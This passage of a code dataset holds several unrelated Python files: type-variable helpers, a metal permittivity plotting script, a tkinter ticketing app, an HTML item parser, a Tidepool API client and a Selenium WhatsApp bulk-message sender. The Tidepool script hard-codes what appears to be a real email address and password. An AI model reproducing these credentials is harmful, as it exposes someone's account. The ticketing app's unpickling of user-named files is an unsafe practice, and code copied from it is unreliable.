get_bound(kls):\n \"\"\"Returns the type bound to a `TypeVar` if any. Fails if not TypeVar\n \"\"\"\n assert_typevar(kls)\n return getattr(kls, '__bound__', None)\n\n\ndef get_constraints(kls):\n \"\"\"Returns the constraints of a `TypeVar` if any. Fails if not TypeVar\"\"\"\n\n assert_typevar(kls)\n return getattr(kls, '__constraints__', ())\n\n\ndef assert_typevar(kls):\n \"\"\"A more forceful check for typevar. If the type is not a `TypeVar`, a `TypeError` is raised\"\"\"\n if is_typevar(kls):\n return\n raise TypeError(f\"'{kls.__name__}' is not a `TypeVar`\")\n\n\ndef is_typevar(tp):\n \"\"\"Test if the type represents a type variable. 
Examples::\n \"\"\"\n\n return type(tp) is typing.TypeVar\n\n\ndef get_generic_type(obj):\n \"\"\"Get the generic type of an object if possible, or runtime class otherwise.\n Examples::\n\n class Node(Generic[T]):\n ...\n type(Node[int]()) == Node\n get_generic_type(Node[int]()) == Node[int]\n get_generic_type(Node[T]()) == Node[T]\n get_generic_type(1) == int\n \"\"\"\n\n gen_type = getattr(obj, '__orig_class__', None)\n return gen_type if gen_type is not None else type(obj)\n","sub_path":"datamapping/_helpers/generics.py","file_name":"generics.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"339221098","text":"import numpy as np\nimport pylab as py\n\npts = 1000\nrad = \"r = 500 nm\"\n\neps_file = open(\"silver.txt\",'w')\nwaves = np.linspace(300,1100,pts)\nnr = waves*0+ 1.0\nni = waves*0\n\nc = 299792458\nhbar = 1.05457173e-34\ne = 1.602176565e-19\n\ndef Au():\n wp = 9.03\n sig = [.760,.024,.010,.071,.601,4.384]\n f = [0,.415,.830,2.969,4.304,13.32]\n gam = [.053,.241,.345,.870,2.494,2.214]\n\n size = len(sig)\n \n waves = np.linspace(300,1100,pts)\n nr = waves*0+ 1.0\n ni = waves*0\n omega = 2*np.pi*c*hbar/(e*waves*1e-9)\n for i in range(size):\n eps_new = sig[i]*wp**2/(f[i]**2-omega**2 - 1j*omega*gam[i])\n nr += eps_new.real\n ni += eps_new.imag\n py.figure(1)\n py.plot(waves,nr,label=\"real\")\n py.plot(waves,ni,label=\"imag\")\n py.title(\"Au permittivity\")\n py.xlabel(\"Wavelength (nm)\")\n py.ylabel(\"Relative permittivity\")\n py.legend()\n\n return nr,ni\n \ndef Ag():\n wp = 9.01\n #sig = [.845,.065,.124,.011,.840,5.646]\n #f = [0,.816,4.481,8.185,9.083,20.29]\n #gam = [.048,3.886,.452,.065,.916,2.419]\n sig = [1.01889808, 0.62834151]\n f = [0,5.05635462]\n gam = [0.01241231, 0.54965831]\n size = len(sig)\n \n waves = np.linspace(300,1100,pts)\n nr = waves*0+ 1.0\n ni = waves*0\n omega = 2*np.pi*c*hbar/(e*waves*1e-9)\n for i in range(size):\n eps_new = sig[i]*wp**2/(f[i]**2-omega**2 - 1j*omega*gam[i])\n n_new = eps_new\n nr += n_new.real\n ni += n_new.imag\n py.figure(1)\n py.plot(waves,nr,'b--',label=\"real, Rakic\")\n py.plot(waves,ni,'g--',label=\"imag, Rakic\")\n py.title(\"Ag Permittivity\")\n py.xlabel(\"Wavelength (nm)\")\n py.ylabel(\"Relative permittivity\")\n\n return nr,ni\n\ndef effective(nr, ni, f):\n em = 1.33**2\n ratio = (nr-em)/(nr + 2*em)\n new_nr = em*(1+3*f*ratio/(1-f*ratio))\n new_ni = ni\n return new_nr, new_ni\n\ndef make_eps_file(nr,ni):\n for i in range(pts):\n str_to_write = str(waves[i]) +'\\t' + str(nr[i]) +'\\t' + str(ni[i]) + '\\n'\n eps_file.write(str_to_write)\n\ndef plot_eps_file(name):\n py.figure(1)\n out_file = open(name,'r')\n A = []\n B = []\n C = []\n for line in out_file:\n lam,a,b = [float(k) for k in line.split()]\n A.append(lam); B.append(a); C.append(b)\n py.plot(A,B,'b', label = \"real, JC\")\n py.plot(A,C,'g', label = \"imag, JC\")\n py.legend(loc=3)\n return np.array(B),np.array(C)\n\ndef plot_cross_sections(name, style = \"-\"):\n py.figure(2)\n out_file = open(name,'r')\n A = []\n B = []\n C = []\n for line in out_file:\n try:\n q,lam,a,b,c = [float(k) for k in line.split()]\n except:\n continue\n A.append(a); B.append(b); C.append(c)\n A,B,C = map(np.array, [A,B,C])\n py.plot(waves,A, 'b' + style)\n py.plot(waves,B, 'g' + style)\n #py.plot(waves,C/10**6, 'r' + style)\n py.xlabel(\"wavelength (nm)\")\n py.ylabel(\"Cross Section ($\\mu m^2$)\")\n py.title(\"Cross Sections\")\n\n#nr,ni = Ag()\n#nr, ni = 
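effective(nr,ni,0.13) (see the added note below)\n\n# Note (added; hedged): effective() above applies a Maxwell Garnett-style mixing rule\n# to the real part only (ni is passed through unchanged):\n#   ratio = (eps - em)/(eps + 2*em);  eps_eff = em*(1 + 3*f*ratio/(1 - f*ratio))\n# with em = 1.33**2 (a water-like host) and f the inclusion volume fraction.\n# Assumed workflow, mirroring the commented calls in this file:\n#   nr, ni = Ag()                      # Drude-Lorentz permittivity of silver\n#   nr, ni = effective(nr, ni, 0.13)   # f = 13 % volume fraction\n#   make_eps_file(nr, ni)              # write the wavelength/eps table\n\n#nr, ni = 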
effective(nr,ni,0.13)\n#make_eps_file(nr,ni)\n#nr, ni = plot_eps_file(\"eps_ag_jc.txt\")\n#nr, ni = effective(nr,ni,0.27)\n#make_eps_file(nr,ni)\n\nplot_cross_sections(\"sphere.out\")\n#plot_cross_sections(\"cluster_rakic.out\", \"--\")\npy.grid()\npy.show()\n","sub_path":"make_file.py","file_name":"make_file.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"66917975","text":"import tkinter\nimport pickle\nfrom tkinter import END\n\nclass MainWindow:\n\n def __init__(self):\n\n self.mainWindow = tkinter.Tk()\n self.mainWindow.title(\"Ticketing System\")\n\n self.ticketButton = tkinter.Button(self.mainWindow, text=\"Open Ticketing System\", command=self.displayTickets)\n ##self.studentsButton = tkinter.Button(self.mainWindow, text=\"Open Agent System\", command=self.displayAgents)\n self.archiveButton = tkinter.Button(self.mainWindow, text=\"Open Ticket Archive\", command = self.displayArchive)\n self.quitButton = tkinter.Button(self.mainWindow, text=\"Quit\", command = self.mainWindow.destroy)\n\n self.ticketButton.pack()\n ##self.studentsButton.pack()\n self.archiveButton.pack()\n self.quitButton.pack()\n\n tkinter.mainloop()\n\n def displayTickets(self):\n ticketGUI = ticketWindow()\n \n\n ##def displayAgents(self):\n ## print(\"Under Construction\")\n\n def displayArchive(self):\n archiveGUI = archiveWindowClass()\n\n\nclass ticketWindow:\n\n def __init__(self):\n\n self.ticketWindow = tkinter.Toplevel()\n self.ticketWindow.title(\"Ticketing System\")\n\n self.addTicketButton = tkinter.Button(self.ticketWindow, text=\"Add Ticket\", command=self.addTicket)\n self.editTicketButton = tkinter.Button(self.ticketWindow, text=\"Edit Ticket\", command=self.editTicket)\n self.quitButton = tkinter.Button(self.ticketWindow, text = \"Quit\", command = self.ticketQuit)\n\n self.addTicketButton.pack()\n self.editTicketButton.pack()\n self.quitButton.pack()\n\n tkinter.mainloop()\n\n def addTicket(self):\n addTicketGUI = addTicketWindowClass()\n\n def editTicket(self):\n editTicketGUI = editTicketWindowClass()\n\n def ticketQuit(self):\n self.ticketWindow.destroy()\n\nclass addTicketWindowClass:\n\n def __init__(self):\n\n\n self.addTicketWindow = tkinter.Toplevel()\n self.addTicketWindow.title(\"Create Ticket\")\n\n self.ticketIDFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketSubjectFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketStateFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketAssignedFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketPriorityFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketDescriptionFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketCommentsFrame = tkinter.Frame(self.addTicketWindow)\n self.exitFrame = tkinter.Frame(self.addTicketWindow)\n\n self.ticketIDFrame.pack()\n self.ticketSubjectFrame.pack()\n self.ticketStateFrame.pack()\n self.ticketAssignedFrame.pack()\n self.ticketPriorityFrame.pack()\n self.ticketDescriptionFrame.pack()\n self.ticketCommentsFrame.pack()\n self.exitFrame.pack()\n\n self.ticketIDLabel = tkinter.Label(self.ticketIDFrame, text=\"Ticket ID:\")\n self.ticketIDEntry = tkinter.Entry(self.ticketIDFrame, width=10)\n self.ticketIDLabel.pack(side=\"left\")\n self.ticketIDEntry.pack(side=\"left\")\n\n self.ticketSubjectLabel = tkinter.Label(self.ticketSubjectFrame, text=\"Ticket Subject:\")\n self.ticketSubjectEntry = tkinter.Entry(self.ticketSubjectFrame, width = 20)\n self.ticketSubjectLabel.pack(side=\"left\")\n 
self.ticketSubjectEntry.pack(side=\"left\")\n \n self.ticketStateLabel = tkinter.Label(self.ticketStateFrame, text=\"Ticket State:\")\n self.ticketStateEntry = tkinter.Entry(self.ticketStateFrame, width = 10)\n self.ticketStateEntry.insert(0, \"Open\")\n self.ticketStateLabel.pack(side=\"left\")\n self.ticketStateEntry.pack(side=\"left\")\n\n self.ticketAssignedLabel = tkinter.Label(self.ticketAssignedFrame, text=\"Assigned Student:\")\n self.ticketAssignedEntry = tkinter.Entry(self.ticketAssignedFrame, width = 20)\n self.ticketAssignedLabel.pack(side=\"left\")\n self.ticketAssignedEntry.pack(side=\"left\")\n\n self.ticketPriorityLabel = tkinter.Label(self.ticketPriorityFrame, text=\"Priority:\")\n self.ticketPriorityEntry = tkinter.Entry(self.ticketPriorityFrame, width=10)\n self.ticketPriorityEntry.insert(0, \"Low\")\n self.ticketPriorityLabel.pack(side=\"left\")\n self.ticketPriorityEntry.pack(side=\"left\")\n\n self.ticketDescriptionLabel = tkinter.Label(self.ticketDescriptionFrame, text=\"Description:\")\n self.ticketDescriptionEntry = tkinter.Text(self.ticketDescriptionFrame, height=5)\n self.ticketDescriptionLabel.pack(side=\"top\")\n self.ticketDescriptionEntry.pack(side=\"top\")\n\n self.ticketCommentsLabel = tkinter.Label(self.ticketCommentsFrame, text=\"Comments:\")\n self.ticketCommentsEntry = tkinter.Text(self.ticketCommentsFrame, height=3)\n self.ticketCommentsLabel.pack(side=\"top\")\n self.ticketCommentsEntry.pack(side=\"top\")\n\n self.saveButton = tkinter.Button(self.exitFrame, text=\"Save\", command=self.saveTicket)\n self.exitButton = tkinter.Button(self.exitFrame, text=\"Exit\", command=self.exitTicket)\n self.savedLabel = tkinter.Label(self.exitFrame, text=\"\")\n self.saveButton.pack(side=\"left\")\n self.exitButton.pack(side=\"left\")\n self.savedLabel.pack(side=\"right\")\n\n def saveTicket(self):\n\n go = 0\n \n id = self.ticketIDEntry.get()\n\n if id == \"\":\n self.savedLabel.config(text=\"An ID is required.\")\n else:\n go = 1\n\n subject = self.ticketSubjectEntry.get()\n state = self.ticketStateEntry.get()\n assigned = self.ticketAssignedEntry.get()\n priority = self.ticketPriorityEntry.get()\n description = self.ticketDescriptionEntry.get(\"1.0\",\"end-1c\")\n comments = self.ticketCommentsEntry.get(\"1.0\",\"end-1c\")\n \n\n list = [id, subject, state, assigned, priority, description, comments]\n\n if go == 1:\n\n filename = \"tickets/\" + id + \".dat\"\n\n ##creates the ticket file\n file = open(filename, \"wb\")\n pickle.dump(list, file)\n file.close()\n self.savedLabel.config(text=\"Saved successfully.\")\n\n try:\n file = open(\"tickets/archive.dat\", \"rb\")\n archive = pickle.load(file)\n file.close()\n except:\n # the archive does not exist yet (open failed), so start a fresh one;\n # closing the never-opened file here would raise a NameError\n file = open(\"tickets/archive.dat\", \"wb\")\n archive = dict()\n pickle.dump(archive, file)\n file.close()\n\n archive[id] = list\n\n file = open(\"tickets/archive.dat\", \"wb\")\n pickle.dump(archive, file)\n file.close()\n\n\n def exitTicket(self):\n self.addTicketWindow.destroy()\n\nclass editTicketWindowClass:\n\n def __init__(self):\n\n\n\n self.editTicketWindow = tkinter.Toplevel()\n self.editTicketWindow.title(\"Edit Ticket\")\n\n self.ticketIDFrame = tkinter.Frame(self.editTicketWindow)\n self.ticketSubjectFrame = tkinter.Frame(self.editTicketWindow)\n self.ticketStateFrame = tkinter.Frame(self.editTicketWindow)\n self.ticketAssignedFrame = tkinter.Frame(self.editTicketWindow)\n self.ticketPriorityFrame = tkinter.Frame(self.editTicketWindow)\n self.ticketDescriptionFrame = tkinter.Frame(self.editTicketWindow)\n 
self.ticketCommentsFrame = tkinter.Frame(self.editTicketWindow)\n self.exitFrame = tkinter.Frame(self.editTicketWindow)\n\n self.fileFrame = tkinter.Frame(self.editTicketWindow)\n\n self.fileFrame.pack()\n self.ticketIDFrame.pack()\n self.ticketSubjectFrame.pack()\n self.ticketStateFrame.pack()\n self.ticketAssignedFrame.pack()\n self.ticketPriorityFrame.pack()\n self.ticketDescriptionFrame.pack()\n self.ticketCommentsFrame.pack()\n self.exitFrame.pack()\n \n\n self.fileLabel = tkinter.Label(self.fileFrame, text=\"Ticket ID/Filename:\")\n self.fileEntry = tkinter.Entry(self.fileFrame, width=10)\n self.fileButton = tkinter.Button(self.fileFrame, text=\"Import\", command=self.loadTicket)\n self.loadedLabel = tkinter.Label(self.fileFrame, text=\"\")\n \n self.fileLabel.pack(side=\"left\")\n self.fileEntry.pack(side=\"left\")\n self.fileButton.pack(side=\"left\")\n self.loadedLabel.pack(side=\"left\")\n\n self.ticketIDLabel = tkinter.Label(self.ticketIDFrame, text=\"Ticket ID:\")\n self.ticketIDEntry = tkinter.Entry(self.ticketIDFrame, width=10)\n self.ticketIDLabel.pack(side=\"left\")\n self.ticketIDEntry.pack(side=\"left\")\n\n self.ticketSubjectLabel = tkinter.Label(self.ticketSubjectFrame, text=\"Ticket Subject:\")\n self.ticketSubjectEntry = tkinter.Entry(self.ticketSubjectFrame, width = 20)\n self.ticketSubjectLabel.pack(side=\"left\")\n self.ticketSubjectEntry.pack(side=\"left\")\n \n self.ticketStateLabel = tkinter.Label(self.ticketStateFrame, text=\"Ticket State:\")\n self.ticketStateEntry = tkinter.Entry(self.ticketStateFrame, width = 10)\n self.ticketStateEntry.insert(0, \"Open\")\n self.ticketStateLabel.pack(side=\"left\")\n self.ticketStateEntry.pack(side=\"left\")\n\n self.ticketAssignedLabel = tkinter.Label(self.ticketAssignedFrame, text=\"Assigned Student:\")\n self.ticketAssignedEntry = tkinter.Entry(self.ticketAssignedFrame, width = 20)\n self.ticketAssignedLabel.pack(side=\"left\")\n self.ticketAssignedEntry.pack(side=\"left\")\n\n self.ticketPriorityLabel = tkinter.Label(self.ticketPriorityFrame, text=\"Priority:\")\n self.ticketPriorityEntry = tkinter.Entry(self.ticketPriorityFrame, width=10)\n self.ticketPriorityEntry.insert(0, \"Low\")\n self.ticketPriorityLabel.pack(side=\"left\")\n self.ticketPriorityEntry.pack(side=\"left\")\n\n self.ticketDescriptionLabel = tkinter.Label(self.ticketDescriptionFrame, text=\"Description:\")\n self.ticketDescriptionEntry = tkinter.Text(self.ticketDescriptionFrame, height=5)\n self.ticketDescriptionLabel.pack(side=\"top\")\n self.ticketDescriptionEntry.pack(side=\"top\")\n\n self.ticketCommentsLabel = tkinter.Label(self.ticketCommentsFrame, text=\"Comments:\")\n self.ticketCommentsEntry = tkinter.Text(self.ticketCommentsFrame, height=3)\n self.ticketCommentsLabel.pack(side=\"top\")\n self.ticketCommentsEntry.pack(side=\"top\")\n\n self.saveButton = tkinter.Button(self.exitFrame, text=\"Save\", command=self.saveTicket)\n self.exitButton = tkinter.Button(self.exitFrame, text=\"Exit\", command=self.exitTicket)\n self.saveButton.pack(side=\"left\")\n self.exitButton.pack(side=\"left\")\n\n self.savedLabel = tkinter.Label(self.exitFrame, text=\"\")\n self.savedLabel.pack(side=\"left\")\n\n def saveTicket(self):\n\n id = self.ticketIDEntry.get()\n subject = self.ticketSubjectEntry.get()\n state = self.ticketStateEntry.get()\n assigned = self.ticketAssignedEntry.get()\n priority = self.ticketPriorityEntry.get()\n description = self.ticketDescriptionEntry.get(\"1.0\",\"end-1c\")\n comments = self.ticketCommentsEntry.get(\"1.0\",\"end-1c\")\n\n 
list = [id, subject, state, assigned, priority, description, comments]\n\n filename = \"tickets/\" + id + \".dat\"\n\n file = open(filename, \"wb\")\n pickle.dump(list, file)\n file.close()\n\n self.savedLabel.config(text=\"Successfully saved.\")\n\n\n def loadTicket(self):\n\n filename = self.fileEntry.get()\n filename = \"tickets/\" + filename + \".dat\"\n\n inputFile = open(filename, \"rb\")\n\n input = pickle.load(inputFile)\n\n inputFile.close()\n\n self.ticketIDEntry.delete(0, END)\n self.ticketSubjectEntry.delete(0, END)\n self.ticketStateEntry.delete(0, END)\n self.ticketAssignedEntry.delete(0, END)\n self.ticketPriorityEntry.delete(0, END)\n self.ticketDescriptionEntry.delete(1.0, END)\n self.ticketCommentsEntry.delete(1.0, END)\n\n self.ticketIDEntry.insert(0, input[0])\n self.ticketSubjectEntry.insert(0, input[1])\n self.ticketStateEntry.insert(0, input[2])\n self.ticketAssignedEntry.insert(0, input[3])\n self.ticketPriorityEntry.insert(0, input[4])\n self.ticketDescriptionEntry.insert(1.0, input[5])\n self.ticketCommentsEntry.insert(1.0, input[6])\n\n self.loadedLabel.config(text=\"Successfully loaded.\")\n\n def exitTicket(self):\n self.editTicketWindow.destroy()\n\nclass archiveWindowClass:\n\n def __init__(self):\n\n self.archiveWindow = tkinter.Toplevel()\n self.archiveWindow.title(\"Ticket Archive\")\n\n self.viewArchiveButton = tkinter.Button(self.archiveWindow, text=\"View Tickets\", command=self.viewArchive)\n self.printArchiveButton = tkinter.Button(self.archiveWindow, text=\"Print Archive to Plaintext\", command=self.printArchive)\n\n self.viewArchiveButton.pack()\n self.printArchiveButton.pack()\n\n def viewArchive(self):\n viewArchiveGUI = viewArchiveClass()\n\n def printArchive(self):\n try:\n file = open(\"tickets/archive.dat\", \"rb\")\n archive = pickle.load(file)\n file.close()\n file = open(\"archive.txt\", \"w\")\n\n for x in archive:\n list = archive[x]\n\n file.write(\"ID: \" + list[0] + \"\\n\")\n file.write(\"Subject: \" + list[1] + \"\\n\")\n file.write(\"State: \" + list[2] + \"\\n\")\n file.write(\"Assigned: \" + list[3] + \"\\n\")\n file.write(\"Priority: \" + list[4] + \"\\n\")\n file.write(\"Description: \" + list[5] + \"\\n\")\n file.write(\"Comments: \" + list[6] + \"\\n\")\n file.write(\"\\n\")\n\n self.printArchiveButton.config(text=\"Printed to Archive.txt\")\n except:\n print(\"At least one ticket must be generated before the archival system can be used.\")\n\nclass viewArchiveClass:\n\n output = list()\n archive = dict()\n index = 0\n\n def __init__(self):\n\n try:\n file = open(\"tickets/archive.dat\", \"rb\")\n self.archive = pickle.load(file)\n file.close()\n except:\n print(\"At least one ticket must be generated before the archival system can be used.\")\n\n self.viewArchiveWindow = tkinter.Toplevel()\n self.viewArchiveWindow.title(\"View Archive\")\n\n self.archiveList = tkinter.Listbox(self.viewArchiveWindow, selectmode=\"SINGLE\")\n self.archiveButton = tkinter.Button(self.viewArchiveWindow, text=\"Select\", command=self.selectIndex)\n self.archiveList.pack()\n self.archiveButton.pack()\n\n self.archiveViewFrame = tkinter.Frame(self.viewArchiveWindow)\n self.archiveViewFrame.pack()\n\n self.archiveIDLabel = tkinter.Label(self.archiveViewFrame, text=\"Ticket ID:\")\n self.archiveIDLabel.pack(side=\"top\")\n\n self.archiveSubjectLabel = tkinter.Label(self.archiveViewFrame, text=\"Ticket Subject:\")\n self.archiveSubjectLabel.pack(side=\"top\")\n \n self.archiveStateLabel = tkinter.Label(self.archiveViewFrame, text=\"Ticket State:\")\n self.archiveStateLabel.pack(side=\"top\")\n\n self.archiveAssignedLabel = tkinter.Label(self.archiveViewFrame, text=\"Assigned Student:\")\n self.archiveAssignedLabel.pack(side=\"top\")\n\n self.archivePriorityLabel = tkinter.Label(self.archiveViewFrame, text=\"Priority:\")\n self.archivePriorityLabel.pack(side=\"top\")\n\n self.archiveDescriptionLabel = tkinter.Label(self.archiveViewFrame, text=\"Description:\")\n self.archiveDescriptionLabel.pack(side=\"top\")\n\n self.archiveCommentsLabel = tkinter.Label(self.archiveViewFrame, text=\"Comments:\")\n self.archiveCommentsLabel.pack(side=\"top\")\n\n for var in self.archive:\n list = self.archive[var]\n self.archiveList.insert(END, list[0])\n\n def selectIndex(self):\n\n index = self.archiveList.get(self.archiveList.curselection())\n self.output = self.archive[index]\n\n ID = self.output[0]\n subject = self.output[1]\n state = self.output[2]\n assigned = self.output[3]\n priority = self.output[4]\n description = self.output[5]\n comments = self.output[6]\n\n self.archiveIDLabel.config(text=\"Ticket ID: \" + ID)\n self.archiveSubjectLabel.config(text=\"Ticket Subject: \" + subject)\n self.archiveStateLabel.config(text=\"Ticket State: \" + state)\n self.archiveAssignedLabel.config(text=\"Assigned Student: \" + assigned)\n self.archivePriorityLabel.config(text=\"Priority: \" + priority)\n self.archiveDescriptionLabel.config(text=\"Description: \" + description)\n self.archiveCommentsLabel.config(text=\"Comments: \" + comments)\n\n \n\n \n\n \n","sub_path":"Release/windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":16877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"417498621","text":"from bs4 import BeautifulSoup, NavigableString\n\n# styles = {\n#     \"-mod\": \"#%s\",\n#     \"-value\": \"**%s**\",\n#     \"-flavour\": \"*%s*\",\n#     \"-corrupted\": \"%s\"\n# }\n\nhide_string = \"##### \\n\\n###### \\n\\n#### \\n\\n%s\\n\\n***\\n\\n\"\n\ndef parse_item(page):\n soup = BeautifulSoup(page, \"html.parser\")\n # Find div with class item-box. Only unique items so far..\n itembox = soup.find(\"div\", { \"class\": \"item-box\" })\n if not itembox or \"-unique\" not in itembox[\"class\"]: return \"\"\n header = itembox.find(\"span\", { \"class\": \"header\" })\n unique_name = header.children.next().text\n base_item = header.find(\"a\").text\n \n unparsed_groups = itembox.find(\"span\", { \"class\": \"item-stats\" }).find_all(\"span\", { \"class\": \"group\" })\n \n groups = []\n for group in unparsed_groups:\n lines = []\n line = \"\"\n for child in group.children:\n if not unicode(child).strip():\n continue #Ignore whitespace lines.\n elif unicode(child) == '<br/>
':\n lines.append(line)\n line = \"\"\n else: \n line += format_text(child) or \"\"\n if line != \"\":\n lines.append(line)\n groups.append(lines)\n item_string = make_string(unique_name, base_item, groups)\n #return (hide_string % unique_name) + item_string + \"\\n\\n\" #Add hiding.. Shows \"GGG forum post. Hover to view.\".\n return item_string + \"\\n\\n\"\n\ndef format_text(child):\n if type(child) == NavigableString:\n classes = child.parent[\"class\"]\n else:\n classes = child[\"class\"]\n\n if \"-value\" in classes:\n return \"**%s**\" % child.string\n elif \"-corrupted\" in classes:\n return child.string\n elif \"-fire\" in classes:\n return child.string #Should be red, but not possible.\n elif \"-cold\" in classes:\n return child.string #Should be blue, but not possible.\n elif \"-lightning\" in classes:\n return child.string #Should be yellow, but not possible.\n elif \"-mod\" in classes: \n return \"#%s\" % child.string\n elif \"-flavour\" in classes: \n return \"*%s*\\n>>\" % child.string.strip()\n else:\n return child.string\n\ndef make_string(name, base, groups):\n s = \">######%s[](#break)%s\\n\" % (name, base)\n #s = \">######[%s](%s)[](#break)%s\\n\" % (name, link, base) #also include link in the header..\n for group in groups:\n for line in group:\n s += \">>%s%s\\n\" % (\"\" if line.startswith(\"*\") else \"####\", line)\n s += \">>[](#line)\\n\"\n if len(groups) > 0:\n s = s[:-13]\n return s\n\n# parse_item(open(\"asdf.txt\", \"r\").read())","sub_path":"itemparser.py","file_name":"itemparser.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"502570082","text":"import base64\nimport requests\nimport uuid\nimport ast\n\ndef make_login_request(username, password):\n # build the Basic auth token from the credentials passed in (they were previously hard-coded)\n base64_login_string = base64.b64encode((username + ':' + password).encode())\n url = 'https://devel-api.tidepool.io/auth/login'\n headers = {'Authorization': 'Basic ' + base64_login_string.decode()}\n r = requests.post(url, headers=headers)\n session_token = r.headers['x-tidepool-session-token']\n text_to_object = ast.literal_eval(r.text)\n user_id = text_to_object['userid']\n return session_token, user_id\n\ndef make_note_request(session_token, user_id, note_text):\n \"\"\" session_token goes in header and is required for every note request\n user_id goes in the end of the url\n note goes in the body\n \"\"\"\n # formated_note = format_note(user_id, note_text)\n \n #body = {\"message\": formated_note}\n headers = {'x-tidepool-session-token': session_token}\n url = 'https://devel-api.tidepool.io/message/send/' + user_id\n body = {\n 'guid': 'abcde',\n 'parentmessage' : 'null', #None,\n 'userid': user_id,\n 'groupid': user_id,\n 'timestamp': '2013-11-28T23:07:40+00:00',\n 'createdtime': '2013-11-28T23:07:40+00:00',\n 'messagetext': 'In three words I can sum up everything I have learned about life: it goes on.'\n }\n r = requests.post(url, headers=headers, data=body)\n print(r.headers)\n print(r)\n print(r.text)\n\ndef format_note(user_id, note_text):\n note = {}\n note[\"guid\"] = str(uuid.uuid4())\n note[\"userid\"] = user_id\n note[\"groupid\"] = user_id\n note[\"parentmessage\"] = None\n time_from_note = note_text[\"effective_time_frame\"][\"time_interval\"][\"start_date_time\"]\n formated_time = time_from_note[:19] + '-' + time_from_note[24:]\n note[\"timestamp\"] = formated_time\n note[\"messagetext\"] = str(note_text)\n return note\n\nsession_token, user_id = make_login_request('karina@tidepool.org', 
'Cokacola123')\nnote_text = {\"activity_name\": \"Walking\",\n \"distance\": {\n \"value\": 1668.16991784243,\n \"unit\": \"m\"\n },\n \"effective_time_frame\": {\n \"time_interval\": {\n \"start_date_time\": \"2015-08-02T15:58:21.000-07:00\",\n \"duration\": {\n \"value\": 1179.089,\n \"unit\": \"sec\"\n }\n }\n }\n }\n\nmake_note_request(session_token, user_id, note_text)\n\n\n\n","sub_path":"mhealth.py","file_name":"mhealth.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"425133041","text":"import traceback\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.chrome.options import Options\n\nimport os\nimport platform\nfrom tkinter import Tk\nimport time\nfrom random import seed, random\nimport argparse\n\ntry:\n import autoit\nexcept ModuleNotFoundError:\n pass\n\n\ndef whatsapp_login():\n global wait, browser, search_button, button_frame\n\n if platform.system() == 'Darwin':\n # MACOS Path\n chrome_default_path = os.getcwd() + '/driver/chromedriver'\n else:\n # Windows Path\n chrome_default_path = os.getcwd() + '/driver/chromedriver.exe'\n\n Link = \"https://web.whatsapp.com/\"\n chrome_options = Options()\n chrome_options.add_argument('--user-data-dir=./User_Data')\n chrome_options.add_argument(\"--log-level=3\")\n browser = webdriver.Chrome(\n executable_path=chrome_default_path, options=chrome_options)\n wait = WebDriverWait(browser, 5)\n browser.get(Link)\n browser.maximize_window()\n\n input(\"\\nAfter the page loads properly, press [ENTER]\\n\")\n input(\n \"Now, try to copy the message until the 'WA preview' for the links loads properly, then delete it again\\nFinally press [ENTER]\\n\")\n\n # Defining the search button\n button_x_arg = \"//button[.//span[@data-icon='search']]\"\n search_button = wait.until(\n EC.presence_of_element_located((By.XPATH, button_x_arg)))\n\n frame_x_arg = \"//span[@data-icon='back']/..\"\n button_frame = wait.until(\n EC.presence_of_element_located((By.XPATH, frame_x_arg)))\n\n\ndef isSearchActive():\n search_active = button_frame.value_of_css_property(\"opacity\")\n return(int(search_active))\n\n\ndef contact_parser():\n # Parsing the argument and checks if the contact file exist\n parser = argparse.ArgumentParser(description='Add contact-file argument')\n parser.add_argument('contact_file', type=str, nargs=1)\n try:\n args = parser.parse_args()\n contact_file_name = args.contact_file[0]\n contact_file_path = os.getcwd() + \"\\\\contacts\\\\\" + contact_file_name + \".txt\"\n except:\n contact_file_name = input(\"Insert the name of the contact file that you want to send: \")\n contact_file_path = os.path.dirname(os.path.abspath(__file__)) + \"\\\\contacts\\\\\" + contact_file_name + \".txt\"\n return contact_file_path\n\n\ndef import_contacts():\n contact_file_path = contact_parser()\n contact = []\n try:\n fp = open(contact_file_path, \"r\")\n except Exception as e:\n raise e\n\n while True:\n line = fp.readline()\n con = ' '.join(line.split())\n if con:\n contact.append('\\\"' + con + '\\\"')\n if not line:\n break\n\n fp.close()\n return contact\n\n\ndef import_message():\n print(\"Here's your message 
(emojis might not be printed in the console)\n\")\n message = open(\"message.txt\", \"r\", encoding=\"utf8\")\n message = message.read()\n print(message + \"\\n\\n\")\n # copy message to clipboard\n r = Tk()\n r.withdraw()\n r.clipboard_append(message)\n r.update()\n\n\ndef attachment_verification():\n isAttach = input(\"Would you like to send attachment(yes/no):\")\n\n if isAttach == \"yes\":\n input(\n \"\\n\\nTo send attachment: Put the image on `.\\\\attachment`, then press [ENTER]\")\n image_name = input(\n \"Write the name of the file (including the file format): \")\n image_path = os.getcwd() + \"\\\\attachment\\\\\" + image_name\n print(image_path)\n\n while not os.path.exists(image_path) and image_name != '':\n image_name = input(\n \"Wrong file name. Write the name of the file (including the file format): \")\n image_path = os.getcwd() + \"\\\\attachment\\\\\" + image_name\n print(image_path)\n else:\n image_path = None\n return isAttach, image_path\n\n\ndef send_message(target, image_path):\n if isSearchActive():\n print(\"Search is active, unpressing the button\")\n search_button.click()\n\n try:\n search_button.click()\n actions = ActionChains(browser)\n actions.send_keys(target[1:-1])\n actions.perform()\n\n name_x_arg = '//span[@title=' + target + 